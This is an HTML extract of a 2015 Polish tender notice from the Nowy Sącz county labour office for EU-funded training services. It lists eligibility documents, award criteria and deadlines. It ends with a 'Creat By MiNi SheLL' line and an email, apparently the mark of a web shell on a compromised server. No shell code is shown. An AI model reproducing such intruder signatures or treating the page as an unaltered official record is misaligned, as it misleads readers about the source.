</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji).
Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji);

Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu i dokumentach wymaganych w specyfikacji (Załącznik nr 3 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>d) Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. 
Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający na potwierdzenie spełniania warunków udziału w postępowaniu wymaga złożenia oświadczenia w trybie art. 22 ust 1 ustawy Prawo zamówień publicznych - (oświadczenie to stanowi zał. nr 3 do specyfikacji).
Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku. Wykonawca
 potwierdza spełnianie warunku poprzez złożenie oświadczenia w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych (oświadczenie to stanowi załącznik nr 3 do specyfikacji);

Zamawiający dokona oceny spełniania warunków zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w dostarczonym oświadczeniu i dokumentach wymaganych w specyfikacji (Załącznik nr 3 do SIWZ).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) wykaz wykonanych usług szkoleniowych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów (np. dokumentów), czy zostały wykonane należycie - według wzoru stanowiącego zał. nr 7 do specyfikacji,
b) certyfikat jakości usług ISO - oryginał lub kopię poświadczoną (na każdej zapisanej stronie) za zgodność z oryginałem przez Wykonawcę - w przypadku posiadania stosownego dokumentu,
c) Akredytacja Kuratorium Oświaty zgodna z przedmiotem zamówienia - oryginał lub kopię poświadczoną (na każdej zapisanej stronie) za zgodność z oryginałem przez Wykonawcę - w przypadku posiadania stosownego dokumentu.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie Wykonawcy w realizacji szkoleń indywidualnych lub grupowych zgodnych z przedmiotem zamówienia - 30</li>
<li>3 - Certyfikat jakości usług ISO - 10</li>
<li>4 - Akredytacja Kuratorium Oświaty zgodna z przedmiotem zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Umowa może ulec zmianie w przypadku zmniejszenia liczby uczestników szkolenia z przyczyn niezależnych od Zamawiającego i będącego wynikiem:
a) niepodjęcia szkolenia pomimo wcześniejszych deklaracji o uczestnictwie,
b) przerwania uczestnictwa w szkoleniu (podjęcie pracy przez bezrobotnego, choroba, nieusprawiedliwiona rezygnacja ze szkolenia), którego nie można było przewidzieć w dniu zawarcia umowy.
2. Umowa może ulec zmianie w wyniku wystąpienia następujących okoliczności ze strony Wykonawcy:
a) zmiany kadry realizującej szkolenie w wyniku nieprzewidywalnych zdarzeń losowych (np. choroba, śmierć, rozwiązanie stosunku pracy), których nie można było przewidzieć w dniu zawarcia umowy.
3. Zamawiający wyliczy do umowy koszt szkolenia jednej osoby brutto, jako iloraz całkowitej ceny brutto za szkolenie przez ilość uczestników szkolenia podanych w specyfikacji istotnych warunków zamówienia.
4. W sytuacji, gdy liczba osób szkolonych ulegnie zmniejszeniu stosownie do postanowień pkt. 1. b) wynagrodzenie za szkolenie tych osób stanowi sumę kosztów zrealizowanych osobogodzin przez każdą z tych osób.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup.powiat-ns.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy dla Powiatu Nowosądeckiego, 33-300  Nowy Sącz, ul. Nawojowska 118.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.05.2015 godzina 07:30, miejsce: Ofertę należy złożyć w siedzibie Zamawiającego w Nowym Sączu przy ul. Nawojowskiej 118, na dzienniku podawczym.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> ze środków Funduszu Pracy na finansowanie programów na rzecz promocji zatrudnienia, łagodzenia skutków bezrobocia i aktywizacji zawodowej z przeznaczeniem na realizację projektów współfinansowanych przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Wiedza Edukacja Rozwój, projekt: Aktywizacja osób młodych pozostających bez pracy w Powiecie Nowosądeckim (I)..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com